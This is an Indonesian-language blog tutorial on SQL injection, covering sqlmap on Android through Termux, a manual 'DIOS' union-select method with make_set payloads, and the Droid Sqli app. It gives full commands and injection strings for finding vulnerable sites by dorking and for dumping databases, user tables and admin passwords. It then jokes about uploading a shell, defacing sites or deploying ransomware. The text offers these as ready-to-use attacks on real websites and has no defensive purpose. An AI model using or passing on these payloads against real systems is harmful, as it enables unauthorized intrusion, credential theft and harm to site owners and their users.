Tutorial Sql Injection Dios,Sql Map,Sql Droid Sqli

assalamualaikum wr wb
dalam blog saya kali ini saya akan share cara sql manual dios,sql map,sql menggunakan aplikasi..jadi semua teknik sql dalam satu materi
-penjelasan:
Sql(structure query love) Injection Atau Injeksi  sql adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi.
teknik ini sudah lama di gunakan dari dulu hingga sekarang dan banyak web yg vuln

Sql Map

-SQLMAP adalah tools opensource yang mendeteksi dan melakukan exoloit pada bug SQL injection secara otomatis. Dengan melakukan seranggan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.
 nah tapi kali ini gw cuma ngajarin cara install sql map di android saja:v
*Alat Dan Bahan
 -Hp Android (os 5.0 ke atas) Atau Laptop/pc:v
 -Termux
 -Internet yg Stabil

Langkah-Langkah:
1.Download dan install Termux
2.Lalu Buka Termux dan Ketik Perintah

   $apt update –y(untuk update)

   $apt  install python python2 –y(untuk install python)

   $apt install git(ginstall git agar bisa cloning)

   $git clonehttps://github.com/sqlmapproject/sqlmap
 
   $cd sqlmap (lalu masuk ke  Tool)

   $python2 sqlmap.py
    nah selesai terinstall toolsnya masukan web target
 contoh website target :http://www.target.com/indexphp?id=1

    Lalu Dump Databasenya
    $python2 sqlmap.py -uhttp://www.target.com/index.php?id=1 --dbs
 
    Jika Berhasil Maka Akan Muncul Database webnya
    contoh
    *information_schema
    *j75bajqpa18

    Lalu Buka Databasenya...Information schemanya biarin aja:v
    $python2 sqlmap.py -uhttp://www.target.com/index.php?id=1 –D j75bajqpa18 –tables

nanti akan muncul informasi nama nama tablenya

$ $python2 sqlmap.py -uhttp://www.contoh.com/product.php?id=1 -D

j75bajqpa18 –T users --columns


Untuk memberikan dalam bentuk Kolom Dari Tabel users,disitu nanti akan muncul apa aja yg ada di dalam table nya,seperti email, phone, username, password, phone

Nah tinggal kita dump untuk mengetahui username dan password nya


$ python2 sqlmap.py -uhttp://www.contoh.com/product.php?id=1 -D

j75bajqpa18 –T users –C username,password,phone –dump



penjelasan:
·        --dbs         = Untuk memberikan Database

·        -D             = Nama Database nya

·        -u              = URL dari website yang mau di dump

·        --tables     = Untuk memberikan nama – nama table

·        -T              = Nama Tabel

·        --columns = Untuk memberikan data yang ada pada table

·        -C             = Nama – nama di dalam kolom

·         --dump     = proses akhir untuk mendapatkan username, password

                        dan Nomor Handphone







-Sql Manual Dios(Dump in One Shot)
teknik ini cukup populer dan efektif untuk dump database websitenya

*Dorknya cari di gugel banyak:v

*Langkah-Langkah:
1.Dorking Di Google lalu pilih web yg vuln.nah cara cek web yg vuln adalah dengan menambahkan kode (') dibelakang variabel ID nya.jika VULN, maka akan muncul 'You have an error in your SQL syntax..' atau halaman webnya jadi korsong.
2.lalu kita lanjut cari jumlah kolom dengan injeksi order+by+1--
 contoh: www.target.com/product_view.php?id=65
 tambahkan query order+by+1-- serta jumlah tabel yang mau di cek.
 contoh: www.target.com/product_view?id=65+order+by+10--+- sampe muncul pesan error
         www.target.com/product_view?id=65+order+by+10--+-
 jika errornya di angka order+by+9-- jadi jumlah columnnya ada 8.
 lanjut www.target.com/product_view.php?id=-65+union+select+1,2,3,4,5,6,7,8--
3.di sini Karena order by error nya di nomor 9, sekarang kita union select , untuk mencari angka atau kolom yang dapat di inject.perintah nya kek gini : +union+select +(angka banyaknya kolom)--+-
Union select di nomor 8, karena order by nya error di nomor 9 union select
  contoh www.target.com/product_view.php?id=-65+union+select+1,2,3,4,5,6,7,8,--


3.selanjutnya masukin exploit/query diosnya misalnya gw milih angka 8 lalu masukin query Diosnya
  query/exploit diosnya:
 make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

 contoh: www.target.com/product_view.php?id=-65+union+select+1,2,3,4,5,6,7,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)--
4.Nah lihat itu(gambar diatas), semua column dan beserta table sudah muncul.
Yang kiri itu column kalo yang kanan itu tablenya. Tinggal kita dump deh gaes hehe.

5.Dump User dan Pw Adminya
dengan exploit make_set(6,@:=0x0a,(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--
jadi www.target.com/product_view.php?id=-65+union+select+1,2,3,4,5,6,7,make_set(6,@:=0x0a,(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--

6.Nah kalo Dah nemu User Dan Pwnya tinggal Hash Lalu Cari Login Di webnya Dan Up shell>>Tebas atau Ransomware wkwkwkwk:v


-Sql Menggunakan Aplikasi

Nah ini Teknik Yg paling easy untuk Dump Database website tanpa perlu Sql manual atau sql map..tampilanya pun juga Gui(grafik unit interface) So jadi easy untuk Hek Web:v
nama aplikasi:Droid Sqli
Size:6 mb kalo ga salah;v
mode:online lah asw
os:Android
Link Download: http://www.hackingtools.in/free-download-droidsqli-android-app/
Cara pakai:
1.Cari Target web
2.masukin Dan Klik Inject..otomatis aplikasi akan Dump database Secara otomatis

oke itu beberapa teknik Sql Yg bisa kalian coab..sebenernya ga cuma itu aja ada banyak teknik Sql yg terus berkembang contohnya Sql Lokomedia,Sql balibatang;v
semoga bermanfaat

Bagikan Artikel ini